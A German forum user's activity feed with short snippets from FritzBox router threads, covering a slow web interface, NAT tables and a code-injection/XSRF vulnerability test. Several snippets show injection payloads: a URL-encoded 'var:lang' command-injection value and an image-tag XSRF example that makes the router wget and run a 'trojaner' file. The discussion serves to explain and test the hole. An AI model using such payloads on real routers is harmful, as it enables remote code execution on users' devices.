Aktueller Inhalt von RFZ

Grüße, auf meiner 7490 ist das Interface unbrauchbar langsam. Ein Blick in die Browser Dev-Tools zeigt dass die /data.lua - die wohl alle Daten enthält die das UI anzeigt - 20s braucht. Und das merkt man bei jedem Klick. Wie schnell lädt die bei euch so? Jemand eine Idee woran das liegen kann...

Danke für die schöne Darstellung stefbeer :) Hab ich mir genau so vorgestellt!

Guter Einwand, 30x wär da sicher gut... Mal geschaut ob sich auch der HTTP Header überschreiben lässt? Sonst eben HTML oder JS Redirect. Hast ja recht ;) Ich hab leider keine offline-box übrig... korrekt, bzw. bei JS mit /* am ende ;)

Juhu, da versteht mich einer ;) Umso besser, das heisst man kann sogar den Content-Type header setzen und z.B. ein JavaScript ausgeben, das - in die Testseite eingebunden - die Positiv-Meldung des Tests herbeiführt. Man könnte auch einen Location-Header setzen und damit auf eine Seite umleiten...

Danke, im Sinne des Thread-Erstellers würde ich dann anregen wollen dies für den Test zu nutzen. Das dürfte zuverlässiger sein als der Callback über einen externen Server und geht ausserdem auch offline.

Ich werde hier echt missverstanden :/ Mir ist klar dass man jeden Befehl darüber ausführen kann. Die Frage war, ob die Ausgabe des Befehls vollständig und mit oder ohne Zusatzausgabe über den Webserver zurück an den Client exponiert wird. Also: GET...

Grüße, das heisst der Bug exponiert die Ausgabe des Befehls über den Webserver? Dann würde sich der Test doch einfach durch ausführen lassen des Befehls var:lang=%26echo%22%3Ch1%3ESie%20sind%20angreiffbar%3C%2Fh1%3E%22 in einem iFrame auch offline durchführen lassen. Fände ich die schönere...

Ich meinte nicht die Rückmeldung des PHP-Skripts des Tests, sondern die Rückmeldung der FritzBox mit code-injection. Die ist entweder konstant, aber von der Antwort einer gepatchten Box verschieden, identisch, oder eine Funktion des Parameters. Letzteres wäre am spannendsten. Auf jeden fall...

Grüße, der Test funktioniert ja nur, wenn die FB auch online ist, da ein wget ausgeführt wird... Kann man das nicht auch anders gestalten, dass es auch offline funktioniert? (ja, ich weiss, dann geht keine Statistik mehr :p) Ich hab leider keine verwundbare FB mehr zum testen, aber wie sieht...

Mir ist schon klar, dass es eine Code-Injection Lücke ist. Aber diese kann vom Browser des Nutzers aus nur mittels XSRF ausgenutzt werden. Die üblichen Session-Mechanismen der FritzBox scheinen an dieser Stelle nicht zu greifen, sonst wäre der Angriff nicht möglich.

XSRF Lücken gab und gibt es in Routern und anderen Webinterfaces immer wieder. Dass es noch die selbe Lücke wie damals ist wage ich mal anzuzweifeln ;)

Nein, das stimmt so nicht. Wenn es eine XSRF Lücke ist, und das wird hier so beschrieben als wär es der Fall, dann greift hier keine Cross-Domain Policy. du kannst einfach ein <img src="http://fritz.box/cgi-bin/?cmd=wget%20trojaner%26%26.%2Ftrojaner" /> oder so in deine Website einbauen und kein...

Eine NAT Tabelle ist keine Routing Tabelle und wie ich mit iptables NAT Tabellen ausgeben könnte wüsst ich auch nicht, hätt da wer ne Hilfe?

netstat -nat is nix anderes wie netstat -n -a -t, das hilft mir ned weiter :/

Hallo zusammen, kurze Frage, auf die ich leider keine Antwort gefunden habe... Kann ich mir (Telnet aktiviert) auf einer Standard FritzBox (7270) irgendwie die NAT-Tabelle ausgeben lassen? Besten Dank!